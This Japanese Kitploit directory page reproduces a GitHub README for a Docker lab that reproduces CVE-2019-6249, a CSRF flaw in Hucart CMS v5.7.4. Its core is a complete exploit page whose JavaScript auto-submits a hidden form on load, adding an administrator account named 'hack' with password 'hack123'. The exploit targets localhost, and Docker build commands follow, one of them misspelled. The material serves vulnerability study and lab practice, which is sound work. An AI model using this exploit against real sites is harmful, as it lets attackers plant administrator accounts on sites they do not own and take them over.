Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-6249_Hucart-cms — CVE-2019-6249 Hucart cms 再現環境 | Kitploit
ツール/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms 再現環境

リポジトリを見る
124年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-6249_Hucart cms

一、脆弱性概要

脆弱性名称: Hucart cms v5.7.4 CSRF脆弱性により管理者アカウントを任意に追加可能
報告日: 2019-01-13
脆弱性発見者: AllenChen([email protected])
製品ホームページ: http://www.hucart.com/
ソフトウェアリンク: http://www.hucart.com/
バージョン: v5.7.4
CVE番号: CVE-2019-6249\

二、脆弱性概要

Hucart cms v5.7.4にはCSRF脆弱性が存在し、管理者がログイン後に以下のCSRFテストページにアクセスすると、hackという名前の管理者アカウントを追加できます。

三、悪用コード

expコードは以下の通りです: hackという名前、パスワードhack123の管理者アカウントを追加します。

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

四、参考情報

  • CVE中文申请网:http://www.iwantacve.cn/index.php/archives/109/
  • CVE公式:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db:https://www.exploit-db.com/exploits/46149

五、環境再現(Docker)

Docker環境で以下のコマンドを実行します

docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

オリジナル EMail:[email protected]

ツールをダウンロード